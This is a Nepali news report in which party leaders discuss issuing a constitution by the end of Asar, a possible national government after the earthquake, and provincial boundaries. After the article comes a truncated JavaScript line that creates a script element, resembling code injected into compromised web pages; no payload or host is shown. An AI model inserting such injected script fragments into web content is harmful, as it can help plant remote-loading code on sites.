नेपाली काग्रेस संसदीय दलका प्रमुख सचेतक चिनकाजी श्रेष्ठले दलहरुवीच आगामि असार मसान्तसम्म संविधान जारी गरेर सरकार परिवर्तन गर्ने विषयमा छलफल भएको बताउनुभएको छ। रिपोर्टर्स क्लब नेपालले बुधवार आयोजना गरेको साक्षात्कारमा उहाले भुकम्पपछि साना तिना मतभेद छाडेर नयाँ निर्माणमा लाग्ने माहौल बनेको भन्दै सबैले अडान त्यागेर प्रयत्न गरे छिटै संविधान बन्ने विश्वास ब्यक्त गनुृभयो। श्रेष्ठले एकीकृत नेकपा माओवादीले ६ प्रदेशको प्रस्ताव गरेको र त्यसमा आफुहरुको समर्थन रहेको भन्दै प्रदेश सभालाई नाम तय गर्ने जिम्मेवारी दिने गरी अघि बढ्न सक्ने बताउनुभयो। उहाले सरकारको नेतृत्व परिवर्तन गर्दैमा काम नहुने दावी गर्दै सबै मिलेर अहिलेको सरकारलाई राष्ट्रिय सरकारको स्वरुप लिएर नवनिर्माणको कामलाई अघि बढाउनु पर्ने धारणा राख्नुभयो।

नेकपा एमालेका सचिव प्रदिप ज्ञावलीले मुलुकमा विद्यमान समस्या समाधान हुन्छ भने नेकपा एमाले नेतृत्व बाहेक पनि भूमिका खेल्न तयार रहेको स्पष्ट पार्दै यो सरकारले संविधान जारी गर्ने सम्भावना समेत रहेको बताउनुभयो।सदभावना पार्टीका सह–अध्यक्ष लक्ष्मणलाल कर्णले आफूहरुको प्राथमिकता संविधान निर्माण भएकोले संविधान निर्माण नभई बन्ने कुनै पनि सरकारमा सहभागित नहुने स्पष्ट पार्दै यद्यपी आफुहरु राष्ट्रिय सरकारको भने विरोधी नभएको धारणा राख्नुभयो। कर्णले संघीयतामा कुरा मिल्यो भने सबै विषयमा सहमति बन्ने ठोकुवा गर्दै संघीयताको मुल कुरो संख्या नभई सिमाङकन र पहिचान भएको बताउनुभयो।

var d=document;var s=d.createElement(‘script’);